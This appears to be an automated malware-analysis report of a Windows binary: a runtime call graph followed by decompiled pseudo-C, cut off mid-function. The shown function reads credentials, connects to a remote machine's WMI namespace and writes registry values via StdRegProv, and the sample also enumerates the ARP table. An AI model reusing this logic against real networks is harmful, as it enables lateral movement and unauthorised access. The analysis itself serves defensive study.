___scrt_get_show_window_mode 14371->14372 14373 d65625 14372->14373 14375 d6565d 14372->14375 14376 d619f0 14372->14376 14373->14365 14375->14365 14377 d61a06 14376->14377 14380 d6ffb5 14377->14380 14383 d6ed62 14380->14383 14384 d6ed8a 14383->14384 14386 d6eda2 14383->14386 14387 d72122 __freea 19 API calls 14384->14387 14385 d6edaa 14388 d6e412 __Stoull 37 API calls 14385->14388 14386->14384 14386->14385 14389 d6ed8f 14387->14389 14391 d6edba 14388->14391 14390 d70269 ___std_exception_copy 25 API calls 14389->14390 14398 d6ed9a 14390->14398 14400 d6f186 14391->14400 14392 d6abe4 __Stoull 5 API calls 14394 d61a14 14392->14394 14394->14372 14398->14392 14401 d6f1a5 14400->14401 14402 d72122 __freea 19 API calls 14401->14402 14403 d6ee32 14402->14403 14421 d6d520 ___scrt_get_show_window_mode 14420->14421 14422 d6599b GetVersionExW 14421->14422 14423 d659b9 14422->14423 14444 d642c0 14423->14444 14425 d659de 14426 d6abe4 __Stoull 5 API calls 14425->14426 14428 d659ec 14426->14428 14427 d659da ___scrt_get_show_window_mode 14427->14425 14429 d6eab8 __Stoull 42 API calls 14427->14429 14428->14343 14430 d65a1b 14429->14430 14431 d7009a ___std_exception_copy 20 API calls 14430->14431 14432 d65a21 14431->14432 14458 d62d30 14432->14458 14434 d65a36 ___scrt_get_show_window_mode 14435 d6eab8 __Stoull 42 API calls 14434->14435 14445 d642cb 14444->14445 14446 d642d2 14444->14446 14445->14427 14447 d642db 14446->14447 14448 d6435f 14446->14448 14482 d643a0 14447->14482 14449 d702c9 ___std_exception_copy 20 API calls 14448->14449 14451 d64369 ___scrt_get_show_window_mode 14449->14451 14452 d64382 SHGetSpecialFolderPathW 14451->14452 14452->14427 14453 d64305 14453->14427 14454 d642ea 14454->14453 14455 d68b60 20 API calls 14454->14455 14456 d64316 14455->14456 14456->14456 14457 d6433c CoTaskMemFree 14456->14457 14457->14427 14459 d62d53 14458->14459 14460 d62d6b GetCurrentProcess 14459->14460 14461 d62d5a 14459->14461 14462 d62d91 14460->14462 14463 d6abe4 __Stoull 5 API calls 14461->14463 14462->14461 14465 d62d98 OpenProcessToken 14462->14465 14464 d62d67 14463->14464 14464->14434 14465->14461 14466 d62dac 14465->14466 14466->14461 14483 d643ba 14482->14483 14484 d643cb ___scrt_get_show_window_mode 14482->14484 14485 d6abe4 __Stoull 5 API calls 14483->14485 14487 d643de GetVersionExW 14484->14487 14486 d643c7 14485->14486 14486->14454 14487->14483 14488 d643fc 14487->14488 14488->14483 14489 d64405 LoadLibraryW 14488->14489 14489->14483 14490 d64414 GetProcAddress 14489->14490 14490->14483 14491 d64424 SHGetKnownFolderPath 14490->14491 14492 d6abe4 __Stoull 5 API calls 14491->14492 14493 d64444 14492->14493 14493->14454 14938 d777fe 14935->14938 14939 d77817 14938->14939 14940 d6abe4 __Stoull 5 API calls 14939->14940 14941 d6b297 14940->14941 14941->13211 12744 d6acec 12749 d6b598 SetUnhandledExceptionFilter 12744->12749 12746 d6acf1 12750 d71063 12746->12750 12748 d6acfc 12749->12746 12751 d71089 12750->12751 12752 d7106f 12750->12752 12751->12748 12752->12751 12757 d72122 12752->12757 12763 d71fde GetLastError 12757->12763 12760 d70269 12995 d701ee 12760->12995 12762 d70275 12762->12748 12764 d71ff7 12763->12764 12767 d71ffd 12763->12767 12782 d74e48 12764->12782 12769 d72054 SetLastError 12767->12769 12789 d71890 12767->12789 12771 d71079 12769->12771 12770 d72017 12796 d717c5 12770->12796 12771->12760 12776 d72033 12808 d71dcc 12776->12808 12777 d7204b SetLastError 12777->12771 12780 d717c5 __freea 16 API calls 12781 d72044 12780->12781 12781->12769 12781->12777 12813 d74c37 12782->12813 12785 d74e87 TlsGetValue 12788 d74e7b 12785->12788 12787 d74e98 12787->12767 12820 d6abe4 12788->12820 12790 d7189d _GetRangeOfTrysToCheck 12789->12790 12791 d718dd 12790->12791 12792 d718c8 RtlAllocateHeap 12790->12792 12835 d702e8 12790->12835 12793 d72122 __freea 18 API calls 12791->12793 12792->12790 12794 d718db 12792->12794 12793->12794 12794->12770 12801 d74e9e 12794->12801 12797 d717d0 HeapFree 12796->12797 12798 d717fd 12796->12798 12797->12798 12799 d717e5 12797->12799 12798->12777 12800 d72122 __freea 18 API calls 12799->12800 12800->12798 12802 d74c37 _GetRangeOfTrysToCheck 5 API calls 12801->12802 12803 d74ec5 12802->12803 12804 d74ee0 TlsSetValue 12803->12804 12805 d74ed4 12803->12805 12804->12805 12806 d6abe4 __Stoull 5 API calls 12805->12806 12807 d7202c 12806->12807 12807->12770 12807->12776 12851 d71da4 12808->12851 12814 d74c63 12813->12814 12817 d74c67 12813->12817 12814->12817 12818 d74c87 12814->12818 12827 d74cd3 12814->12827 12816 d74c93 GetProcAddress 12819 d74ca3 __CreateFrameInfo 12816->12819 12817->12785 12817->12788 12818->12816 12818->12817 12819->12817 12821 d6abef IsProcessorFeaturePresent 12820->12821 12822 d6abed 12820->12822 12824 d6aeac 12821->12824 12822->12787 12834 d6ae70 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12824->12834 12826 d6af8f 12826->12787 12828 d74cf4 LoadLibraryExW 12827->12828 12833 d74ce9 12827->12833 12829 d74d11 GetLastError 12828->12829 12832 d74d29 12828->12832 12830 d74d1c LoadLibraryExW 12829->12830 12829->12832 12830->12832 12831 d74d40 FreeLibrary 12831->12833 12832->12831 12832->12833 12833->12814 12834->12826 12840 d7032c 12835->12840 12837 d6abe4 __Stoull 5 API calls 12838 d70328 12837->12838 12838->12790 12839 d702fe 12839->12837 12841 d70338 ___InternalCxxFrameHandler 12840->12841 12846 d75c0f EnterCriticalSection 12841->12846 12843 d70343 12847 d70375 12843->12847 12845 d7036a ___InternalCxxFrameHandler 12845->12839 12846->12843 12850 d75c57 LeaveCriticalSection 12847->12850 12849 d7037c 12849->12845 12850->12849 12857 d71ce4 12851->12857 12853 d71dc8 12854 d71d54 12853->12854 12868 d71be8 12854->12868 12856 d71d78 12856->12780 12858 d71cf0 ___InternalCxxFrameHandler 12857->12858 12863 d75c0f EnterCriticalSection 12858->12863 12860 d71cfa 12864 d71d20 12860->12864 12862 d71d18 ___InternalCxxFrameHandler 12862->12853 12863->12860 12867 d75c57 LeaveCriticalSection 12864->12867 12866 d71d2a 12866->12862 12867->12866 12869 d71bf4 ___InternalCxxFrameHandler 12868->12869 12876 d75c0f EnterCriticalSection 12869->12876 12871 d71bfe 12877 d71f0f 12871->12877 12873 d71c16 12881 d71c2c 12873->12881 12875 d71c24 ___InternalCxxFrameHandler 12875->12856 12876->12871 12878 d71f45 __Stoull 12877->12878 12879 d71f1e __Stoull 12877->12879 12878->12873 12879->12878 12884 d773d4 12879->12884 12994 d75c57 LeaveCriticalSection 12881->12994 12883 d71c36 12883->12875 12885 d773ea 12884->12885 12909 d77454 12884->12909 12891 d7741d 12885->12891 12894 d717c5 __freea 19 API calls 12885->12894 12885->12909 12886 d774a2 12952 d77547 12886->12952 12888 d717c5 __freea 19 API calls 12889 d77476 12888->12889 12890 d717c5 __freea 19 API calls 12889->12890 12895 d77489 12890->12895 12892 d7743f 12891->12892 12900 d717c5 __freea 19 API calls 12891->12900 12893 d717c5 __freea 19 API calls 12892->12893 12896 d77449 12893->12896 12898 d77412 12894->12898 12899 d717c5 __freea 19 API calls 12895->12899 12903 d717c5 __freea 19 API calls 12896->12903 12897 d77510 12905 d717c5 __freea 19 API calls 12897->12905 12912 d76f4e 12898->12912 12902 d77497 12899->12902 12901 d77434 12900->12901 12940 d7704c 12901->12940 12907 d717c5 __freea 19 API calls 12902->12907 12903->12909 12910 d77516 12905->12910 12906 d717c5 19 API calls __freea 12911 d774b0 12906->12911 12907->12886 12909->12886 12909->12888 12910->12878 12911->12897 12911->12906 12913 d77048 12912->12913 12914 d76f5f 12912->12914 12913->12891 12915 d717c5 __freea 19 API calls 12914->12915 12917 d76f70 12914->12917 12915->12917 12916 d76f82 12918 d76f94 12916->12918 12920 d717c5 __freea 19 API calls 12916->12920 12917->12916 12919 d717c5 __freea 19 API calls 12917->12919 12921 d76fa6 12918->12921 12922 d717c5 __freea 19 API calls 12918->12922 12919->12916 12920->12918 12923 d717c5 __freea 19 API calls 12921->12923 12924 d76fb8 12921->12924 12922->12921 12923->12924 12925 d717c5 __freea 19 API calls 12924->12925 12929 d76fca 12924->12929 12925->12929 12926 d717c5 __freea 19 API calls 12928 d76fdc 12926->12928 12927 d76fee 12931 d717c5 __freea 19 API calls 12927->12931 12933 d77000 12927->12933 12928->12927 12930 d717c5 __freea 19 API calls 12928->12930 12929->12926 12929->12928 12930->12927 12931->12933 12932 d77012 12935 d717c5 __freea 19 API calls 12932->12935 12937 d77024 12932->12937 12933->12932 12934 d717c5 __freea 19 API calls 12933->12934 12934->12932 12935->12937 12936 d77036 12936->12913 12939 d717c5 __freea 19 API calls 12936->12939 12937->12936 12938 d717c5 __freea 19 API calls 12937->12938 12938->12936 12939->12913 12941 d77059 12940->12941 12951 d770b1 12940->12951 12942 d717c5 __freea 19 API calls 12941->12942 12943 d77069 12941->12943 12942->12943 12944 d717c5 __freea 19 API calls 12943->12944 12946 d7707b 12943->12946 12944->12946 12945 d717c5 __freea 19 API calls 12948 d7708d 12945->12948 12946->12945 12946->12948 12947 d717c5 __freea 19 API calls 12950 d7709f 12947->12950 12948->12947 12948->12950 12949 d717c5 __freea 19 API calls 12949->12951 12950->12949 12950->12951 12951->12892 12953 d77554 12952->12953 12957 d77572 12952->12957 12953->12957 12958 d770f1 12953->12958 12956 d717c5 __freea 19 API calls 12956->12957 12957->12911 12959 d77102 12958->12959 12960 d771cf 12958->12960 12961 d770b5 __Stoull 19 API calls 12959->12961 12960->12956 12962 d7710a 12961->12962 12963 d770b5 __Stoull 19 API calls 12962->12963 12964 d77115 12963->12964 12965 d770b5 __Stoull 19 API calls 12964->12965 12966 d77120 12965->12966 12967 d770b5 __Stoull 19 API calls 12966->12967 12968 d7712b 12967->12968 12969 d770b5 __Stoull 19 API calls 12968->12969 12970 d77139 12969->12970 12971 d717c5 __freea 19 API calls 12970->12971 12972 d77144 12971->12972 12973 d717c5 __freea 19 API calls 12972->12973 12974 d7714f 12973->12974 12975 d717c5 __freea 19 API calls 12974->12975 12976 d7715a 12975->12976 12977 d770b5 __Stoull 19 API calls 12976->12977 12978 d77168 12977->12978 12979 d770b5 __Stoull 19 API calls 12978->12979 12980 d77176 12979->12980 12981 d770b5 __Stoull 19 API calls 12980->12981 12982 d77187 12981->12982 12983 d770b5 __Stoull 19 API calls 12982->12983 12984 d77195 12983->12984 12985 d770b5 __Stoull 19 API calls 12984->12985 12986 d771a3 12985->12986 12987 d717c5 __freea 19 API calls 12986->12987 12988 d771ae 12987->12988 12989 d717c5 __freea 19 API calls 12988->12989 12994->12883 12996 d71fde __CreateFrameInfo 19 API calls 12995->12996 12997 d70204 12996->12997 12998 d70212 12997->12998 12999 d70263 12997->12999 13004 d6abe4 __Stoull 5 API calls 12998->13004 13006 d70296 IsProcessorFeaturePresent 12999->13006 13001 d70268 13002 d701ee ___std_exception_copy 25 API calls 13001->13002 13003 d70275 13002->13003 13003->12762 13005 d70239 13004->13005 13005->12762 13007 d702a1 13006->13007 13010 d7009f 13007->13010 13011 d700bb __CreateFrameInfo ___scrt_get_show_window_mode 13010->13011 13012 d700e7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13011->13012 13015 d701b8 __CreateFrameInfo 13012->13015 13013 d6abe4 __Stoull 5 API calls 13014 d701d6 GetCurrentProcess TerminateProcess 13013->13014 13014->13001 13015->13013 16967 d7220d 16977 d72afc 16967->16977 16971 d7221a 16972 d72a11 19 API calls 16971->16972 16973 d72229 DeleteCriticalSection 16972->16973 16973->16971 16974 d72244 16973->16974 16975 d717c5 __freea 19 API calls 16974->16975 16976 d7224f 16975->16976 16990 d72b05 16977->16990 16979 d72215 16980 d782b8 16979->16980 16981 d782c4 ___InternalCxxFrameHandler 16980->16981 17010 d75c0f EnterCriticalSection 16981->17010 16983 d782cf 16984 d7833a 16983->16984 16986 d7830e DeleteCriticalSection 16983->16986 16988 d6e6ae 66 API calls 16983->16988 17011 d7834f 16984->17011 16987 d717c5 __freea 19 API calls 16986->16987 16987->16983 16988->16983 16989 d78346 ___InternalCxxFrameHandler 16989->16971 16991 d72b11 ___InternalCxxFrameHandler 16990->16991 17000 d75c0f EnterCriticalSection 16991->17000 16993 d72bb4 17005 d72bd4 16993->17005 16996 d72bc0 ___InternalCxxFrameHandler 16996->16979 16998 d72ab5 65 API calls 16999 d72b20 16998->16999 16999->16993 16999->16998 17001 d72259 EnterCriticalSection 16999->17001 17002 d72baa 16999->17002 17000->16999 17001->16999 17008 d7226d LeaveCriticalSection 17002->17008 17004 d72bb2 17004->16999 17009 d75c57 LeaveCriticalSection 17005->17009 17007 d72bdb 17007->16996 17008->17004 17009->17007 17010->16983 17014 d75c57 LeaveCriticalSection 17011->17014 17013 d78356 17013->16989 17014->17013 16825 d77772 16827 d77798 16825->16827 16829 d77794 16825->16829 16826 d6abe4 __Stoull 5 API calls 16828 d777fa 16826->16828 16827->16829 16830 d74bb5 30 API calls 16827->16830 16829->16826 16830->16827 15093 d708c8 15102 d76aaa GetEnvironmentStringsW 15093->15102 15097 d717c5 __freea 19 API calls 15099 d70915 15097->15099 15098 d708eb 15100 d717c5 __freea 19 API calls 15098->15100 15101 d708e0 15100->15101 15101->15097 15103 d708da 15102->15103 15104 d76abe 15102->15104 15103->15101 15109 d7091b 15103->15109 15105 d717ff __wsopen_s 20 API calls 15104->15105 15108 d76ad2 15105->15108 15106 d717c5 __freea 19 API calls 15107 d76aec FreeEnvironmentStringsW 15106->15107 15107->15103 15108->15106 15110 d70939 15109->15110 15111 d71890 _GetRangeOfTrysToCheck 19 API calls 15110->15111 15119 d70973 15111->15119 15112 d717c5 __freea 19 API calls 15113 d709fe 15112->15113 15113->15098 15114 d71890 _GetRangeOfTrysToCheck 19 API calls 15114->15119 15115 d709e6 15135 d70a15 15115->15135 15119->15114 15119->15115 15120 d70a08 15119->15120 15122 d717c5 __freea 19 API calls 15119->15122 15124 d709e4 15119->15124 15126 d75c6e 15119->15126 15123 d70296 ___std_exception_copy 11 API calls 15120->15123 15121 d717c5 __freea 19 API calls 15121->15124 15122->15119 15125 d70a14 15123->15125 15124->15112 15127 d75c89 15126->15127 15129 d75c7b 15126->15129 15128 d72122 __freea 19 API calls 15127->15128 15130 d75c93 15128->15130 15129->15127 15131 d75ca2 15129->15131 15132 d70269 ___std_exception_copy 25 API calls 15130->15132 15133 d75c9d 15131->15133 15134 d72122 __freea 19 API calls 15131->15134 15132->15133 15133->15119 15134->15130 15136 d709ec 15135->15136 15137 d70a22 15135->15137 15136->15121 15138 d70a39 15137->15138 15140 d717c5 __freea 19 API calls 15137->15140 15139 d717c5 __freea 19 API calls 15138->15139 15139->15136 15140->15137 13016 d66dd0 13031 d702c9 13016->13031 13019 d66e18 GetIpNetTable 13026 d66e31 13019->13026 13029 d66eba 13019->13029 13020 d66dff 13038 d6e77b 13020->13038 13027 d66e67 EnterCriticalSection 13026->13027 13026->13029 13051 d67c20 13026->13051 13060 d67b20 13027->13060 13074 d7009a 13029->13074 13035 d717ff _GetRangeOfTrysToCheck 13031->13035 13032 d7183d 13033 d72122 __freea 19 API calls 13032->13033 13036 d66de6 GetIpNetTable 13033->13036 13034 d71828 RtlAllocateHeap 13034->13035 13034->13036 13035->13032 13035->13034 13037 d702e8 _GetRangeOfTrysToCheck 7 API calls 13035->13037 13036->13019 13036->13020 13037->13035 13039 d72ccc 13038->13039 13040 d72ce4 13039->13040 13041 d72cd9 13039->13041 13043 d72cec 13040->13043 13049 d72cf5 _GetRangeOfTrysToCheck 13040->13049 13080 d717ff 13041->13080 13046 d717c5 __freea 19 API calls 13043->13046 13044 d72d1f HeapReAlloc 13048 d66e13 13044->13048 13044->13049 13045 d72cfa 13047 d72122 __freea 19 API calls 13045->13047 13046->13048 13047->13048 13048->13019 13049->13044 13049->13045 13050 d702e8 _GetRangeOfTrysToCheck 7 API calls 13049->13050 13050->13049 13052 d67c2e 13051->13052 13053 d67c36 EnterCriticalSection 13051->13053 13052->13026 13054 d67c76 LeaveCriticalSection 13053->13054 13056 d67c5f 13053->13056 13054->13026 13055 d67c96 13087 d6b97b 13055->13087 13056->13054 13056->13055 13057 d67c8b 13056->13057 13057->13054 13061 d67b32 13060->13061 13062 d67ba6 13060->13062 13061->13062 13066 d67b38 13061->13066 13063 d66e7c LeaveCriticalSection 13062->13063 13064 d67bcc 13062->13064 13065 d67c12 13062->13065 13063->13026 13067 d686e0 26 API calls 13064->13067 13068 d6b95b 28 API calls 13065->13068 13066->13063 13069 d67b67 13066->13069 13070 d67c08 13066->13070 13067->13063 13073 d67c1c 13068->13073 13118 d686e0 13069->13118 13126 d6b95b 13070->13126 13075 d717c5 13074->13075 13076 d717d0 HeapFree 13075->13076 13077 d66ec1 13075->13077 13076->13077 13078 d717e5 13076->13078 13079 d72122 __freea 19 API calls 13078->13079 13079->13077 13081 d7183d 13080->13081 13085 d7180d _GetRangeOfTrysToCheck 13080->13085 13082 d72122 __freea 19 API calls 13081->13082 13084 d7183b 13082->13084 13083 d71828 RtlAllocateHeap 13083->13084 13083->13085 13084->13048 13085->13081 13085->13083 13086 d702e8 _GetRangeOfTrysToCheck 7 API calls 13085->13086 13086->13085 13092 d6b91d 13087->13092 13091 d6b99a 13098 d6b874 13092->13098 13095 d6d428 13097 d6d448 13095->13097 13096 d6d47a RaiseException 13096->13091 13097->13096 13101 d6d3a6 13098->13101 13102 d6b8a0 13101->13102 13103 d6d3b3 13101->13103 13102->13095 13103->13102 13104 d702c9 ___std_exception_copy 20 API calls 13103->13104 13105 d6d3d0 13104->13105 13108 d6d3e0 13105->13108 13109 d7176b 13105->13109 13106 d7009a ___std_exception_copy 20 API calls 13106->13102 13108->13106 13111 d71778 13109->13111 13112 d71786 13109->13112 13110 d72122 __freea 19 API calls 13113 d7178e 13110->13113 13111->13112 13114 d7179d 13111->13114 13112->13110 13115 d70269 ___std_exception_copy 25 API calls 13113->13115 13116 d71798 13114->13116 13117 d72122 __freea 19 API calls 13114->13117 13115->13116 13116->13108 13117->13113 13119 d686f3 13118->13119 13131 d6b93e 13119->13131 13135 d6b8c6 13126->13135 13129 d6d428 FindHandler RaiseException 13130 d6b97a 13129->13130 13132 d6b94c 13131->13132 13133 d6d428 FindHandler RaiseException 13132->13133 13134 d6b95a 13133->13134 13136 d6b874 std::exception::exception 27 API calls 13135->13136 13137 d6b8d8 13136->13137 13137->13129 15994 d6ac40 15995 d6ac48 15994->15995 16012 d70e90 15995->16012 15997 d6ac53 16019 d6b13f 15997->16019 15999 d6acdc 16001 d6b406 4 API calls 15999->16001 16000 d6ac68 16000->15999 16024 d6b2e0 16000->16024 16002 d6ace3 16001->16002 16004 d6ac81 16004->15999 16005 d6ac92 16004->16005 16027 d6b39e InitializeSListHead 16005->16027 16007 d6ac97 ___InternalCxxFrameHandler 16028 d6b3aa 16007->16028 16009 d6acba 16034 d70ffb 16009->16034 16011 d6acc5 16013 d70ec2 16012->16013 16014 d70e9f 16012->16014 16013->15997 16014->16013 16015 d72122 __freea 19 API calls 16014->16015 16016 d70eb2 16015->16016 16017 d70269 ___std_exception_copy 25 API calls 16016->16017 16018 d70ebd 16017->16018 16018->15997 16020 d6b14d 16019->16020 16023 d6b152 16019->16023 16021 d6b406 4 API calls 16020->16021 16020->16023 16022 d6b1d5 16021->16022 16023->16000 16041 d6b2a5 16024->16041 16027->16007 16107 d71597 16028->16107 16030 d6b3bb 16031 d6b3c2 16030->16031 16032 d6b406 4 API calls 16030->16032 16031->16009 16033 d6b3ca 16032->16033 16035 d71f5a _GetRangeOfTrysToCheck 37 API calls 16034->16035 16037 d71006 16035->16037 16036 d7103e 16036->16011 16037->16036 16038 d72122 __freea 19 API calls 16037->16038 16039 d71033 16038->16039 16040 d70269 ___std_exception_copy 25 API calls 16039->16040 16040->16036 16042 d6b2c2 16041->16042 16043 d6b2c9 16041->16043 16047 d713eb 16042->16047 16050 d7145b 16043->16050 16046 d6b2c7 16046->16004 16048 d7145b 28 API calls 16047->16048 16049 d713fd 16048->16049 16049->16046 16053 d71162 16050->16053 16056 d71098 16053->16056 16055 d71186 16055->16046 16057 d710a4 ___InternalCxxFrameHandler 16056->16057 16064 d75c0f EnterCriticalSection 16057->16064 16059 d710b2 16065 d712aa 16059->16065 16061 d710bf 16075 d710dd 16061->16075 16063 d710d0 ___InternalCxxFrameHandler 16063->16055 16064->16059 16066 d712c0 __CreateFrameInfo 16065->16066 16067 d712c8 16065->16067 16066->16061 16067->16066 16074 d71321 16067->16074 16078 d776e8 16067->16078 16068 d776e8 28 API calls 16070 d71337 16068->16070 16072 d717c5 __freea 19 API calls 16070->16072 16071 d71317 16073 d717c5 __freea 19 API calls 16071->16073 16072->16066 16073->16074 16074->16066 16074->16068 16106 d75c57 LeaveCriticalSection 16075->16106 16077 d710e7 16077->16063 16080 d776f3 16078->16080 16079 d7771b 16081 d7772a 16079->16081 16087 d7b27f 16079->16087 16080->16079 16082 d7770c 16080->16082 16094 d72ccc 16081->16094 16084 d72122 __freea 19 API calls 16082->16084 16086 d77711 ___scrt_get_show_window_mode 16084->16086 16086->16071 16088 d7b29f HeapSize 16087->16088 16089 d7b28a 16087->16089 16088->16081 16090 d72122 __freea 19 API calls 16089->16090 16091 d7b28f 16090->16091 16092 d70269 ___std_exception_copy 25 API calls 16091->16092 16093 d7b29a 16092->16093 16093->16081 16095 d72ce4 16094->16095 16096 d72cd9 16094->16096 16098 d72cec 16095->16098 16104 d72cf5 _GetRangeOfTrysToCheck 16095->16104 16097 d717ff __wsopen_s 20 API calls 16096->16097 16103 d72ce1 16097->16103 16101 d717c5 __freea 19 API calls 16098->16101 16099 d72d1f HeapReAlloc 16099->16103 16099->16104 16100 d72cfa 16102 d72122 __freea 19 API calls 16100->16102 16101->16103 16102->16103 16103->16086 16104->16099 16104->16100 16105 d702e8 _GetRangeOfTrysToCheck 7 API calls 16104->16105 16105->16104 16106->16077 16108 d715b5 16107->16108 16112 d715d5 16107->16112 16109 d72122 __freea 19 API calls 16108->16109 16110 d715cb 16109->16110 16111 d70269 ___std_exception_copy 25 API calls 16110->16111 16111->16112 16112->16030 16650 d70fa9 16651 d70fb5 ___InternalCxxFrameHandler 16650->16651 16652 d70fec ___InternalCxxFrameHandler 16651->16652 16658 d75c0f EnterCriticalSection 16651->16658 16654 d70fc9 16655 d77698 __Stoull 19 API calls 16654->16655 16656 d70fd9 16655->16656 16659 d70ff2 16656->16659 16658->16654 16662 d75c57 LeaveCriticalSection 16659->16662 16661 d70ff9 16661->16652 16662->16661

    Executed Functions

    Function 00D64C30, Relevance: 89.7, APIs: 41, Strings: 10, Instructions: 423comfile

    Control-flow Graph

    C-Code - Quality: 25%
    			E00D64C30(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, short _a768, char _a2096, char _a2124, char _a3456, char _a3476, signed int _a5572, signed int _a5580) {
				struct _OVERLAPPED* _v8;
				char _v12;
				short _v20;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v52;
				void _v56;
				void* _v72;
				intOrPtr* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				struct _OVERLAPPED* _v108;
				struct _OVERLAPPED* _v120;
				intOrPtr* _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v144;
				intOrPtr* _v176;
				struct _OVERLAPPED* _v200;
				intOrPtr _v220;
				intOrPtr* _v224;
				struct _OVERLAPPED* _v228;
				intOrPtr _v236;
				intOrPtr* _v244;
				char _v248;
				char _v252;
				intOrPtr* _v260;
				intOrPtr _v268;
				short _v272;
				struct _OVERLAPPED* _v276;
				struct _OVERLAPPED* _v280;
				long _v284;
				intOrPtr* _v292;
				long _v296;
				char _v300;
				char _v304;
				void* _v312;
				intOrPtr* _v316;
				intOrPtr* _v336;
				struct _OVERLAPPED* _v340;
				void* _v344;
				long _v348;
				void* _v356;
				intOrPtr* _v360;
				void* _v364;
				long _v368;
				intOrPtr* _v372;
				intOrPtr _v376;
				intOrPtr* _v384;
				struct _OVERLAPPED* _v392;
				intOrPtr _v396;
				intOrPtr* _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr* _v428;
				void* _v436;
				char _v440;
				intOrPtr _v448;
				intOrPtr* _v452;
				signed int _t147;
				signed int _t148;
				void* _t152;
				intOrPtr _t154;
				intOrPtr _t157;
				intOrPtr _t158;
				void _t159;
				intOrPtr _t160;
				char* _t162;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t172;
				void* _t173;
				intOrPtr* _t177;
				intOrPtr* _t179;
				intOrPtr* _t181;
				intOrPtr _t183;
				intOrPtr _t184;
				void* _t185;
				intOrPtr* _t188;
				intOrPtr* _t190;
				intOrPtr* _t192;
				intOrPtr* _t194;
				intOrPtr* _t196;
				intOrPtr* _t200;
				intOrPtr _t203;
				intOrPtr* _t204;
				intOrPtr _t207;
				intOrPtr* _t208;
				void* _t213;
				intOrPtr* _t214;
				intOrPtr* _t216;
				intOrPtr* _t218;
				long _t220;
				long* _t221;
				intOrPtr* _t223;
				intOrPtr* _t225;
				long _t227;
				char* _t229;
				intOrPtr* _t233;
				void* _t234;
				intOrPtr* _t235;
				intOrPtr* _t237;
				intOrPtr* _t239;
				intOrPtr* _t243;
				intOrPtr* _t245;
				intOrPtr* _t247;
				intOrPtr _t250;
				intOrPtr _t252;
				intOrPtr* _t253;
				void* _t254;
				intOrPtr _t255;
				void* _t259;
				intOrPtr* _t260;
				intOrPtr* _t264;
				intOrPtr* _t302;
				intOrPtr* _t303;
				intOrPtr* _t304;
				intOrPtr _t308;
				intOrPtr _t310;
				void* _t311;
				signed int _t312;
				signed int _t313;

				_t313 = _t312 & 0xfffffff8;
				E00D7D900();
				_t147 =  *0xd88004; // 0x276b9783
				_t148 = _t147 ^ _t313;
				_a5580 = _t148;
				_t308 = _a4;
				_t250 = __edx;
				_a16 = __edx;
				_a20 = __ecx;
				_a12 = _t308;
				__imp__CoInitializeEx(0, 0, __edi, __esi, __ebx);
				if(_t148 >= 0) {
					__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 2, 0, 0, 0); // executed
					if(_t148 >= 0 || _t148 == 0x80010119) {
						_v8 = 0;
						__imp__CredUIParseUserNameW(_t250,  &_a3476, 0x201,  &_a2124, 0x151);
						_t152 = LocalAlloc(0x40, 0x1c);
						_t302 = __imp__#2;
						_v56 = _t152;
						_t154 =  *_t302( &_a3456);
						_v44 = _t154;
						_t310 =  *_t302(_t308);
						_t157 =  *_t302( &_a2096);
						_t303 = __imp__#7;
						_t252 = _t157;
						_t158 =  *_t303(_t310);
						_t259 = _v72;
						 *((intOrPtr*)(_t259 + 0x10)) = _t310;
						_t311 = _t259;
						 *((intOrPtr*)(_t259 + 0x14)) = _t158;
						_t159 = _v56;
						 *_t311 = _t159;
						_t160 =  *_t303(_t159);
						 *((intOrPtr*)(_t311 + 4)) = _t160;
						 *((intOrPtr*)(_t311 + 8)) = _t252;
						 *((intOrPtr*)(_t311 + 0xc)) =  *_t303(_t252);
						_t162 =  &_v52;
						 *((intOrPtr*)(_t311 + 0x18)) = 2;
						__imp__CoCreateInstance(0xd7f4b8, 0, 1, 0xd7f3e8, _t162);
						_t304 = __imp__#6;
						if(_t162 >= 0) {
							wsprintfW( &_v20, L"\\\\%s\\root\\CIMV2", _v88);
							_t253 = __imp__#2;
							_t313 = _t313 + 0xc;
							_t170 =  *_t253( &_v12);
							_v84 = _t170;
							_t171 =  *_t253(_v88);
							_v84 = _t171;
							_t172 =  *_t253(_v96);
							_t260 = _v76;
							_v108 = 0;
							_v40 = _t172;
							_t173 =  *((intOrPtr*)( *_t260 + 0xc))(_t260, _v92, _v88, _t172, 0, 0, 0, 0,  &_v108);
							_t304 = __imp__#6; // 0x76fd3f8a
							if(_t173 >= 0) {
								__imp__CoSetProxyBlanket(_v144, 0xffffffff, 0xffffffff, 0xffffffff, 6, 3, _t311, 0);
								if(_t173 >= 0) {
									_t181 = _v176;
									_v120 = 0;
									 *((intOrPtr*)( *_t181))(_t181, 0xd7f2f0,  &_v120);
									__imp__CoSetProxyBlanket(_v132, 0xffffffff, 0xffffffff, 0xffffffff, 6, 3, _t311, 0);
									_t183 =  *_t253(L"SetBinaryValue");
									_v220 = _t183;
									_t184 =  *_t253(L"StdRegProv");
									_t264 = _v228;
									_v200 = 0;
									_v236 = _t184;
									_t185 =  *((intOrPtr*)( *_t264 + 0x18))(_t264, _t184, 0, 0,  &_v200, 0);
									_t304 = __imp__#6;
									if(_t185 < 0) {
										_t254 = _v260;
									} else {
										_t188 = _v224;
										_push(0);
										_push( &_v228);
										_push(0);
										_push(_v248);
										_v228 = 0;
										_push(_t188);
										if( *((intOrPtr*)( *_t188 + 0x4c))() < 0) {
											_t190 = _v244;
											_t254 = _v280;
											 *((intOrPtr*)( *_t190 + 8))(_t190);
										} else {
											_t192 = _v248;
											_push( &_v276);
											_v276 = 0;
											_push(0);
											_push(_t192);
											if( *((intOrPtr*)( *_t192 + 0x3c))() < 0) {
												_t194 = _v260;
												_t254 = _v292;
												 *((intOrPtr*)( *_t194 + 8))(_t194);
												_t196 = _v260;
												 *((intOrPtr*)( *_t196 + 8))(_t196);
											} else {
												__imp__#9( &_v248);
												_v244 = 0x80000001;
												_v252 = 3;
												_t200 = _v292;
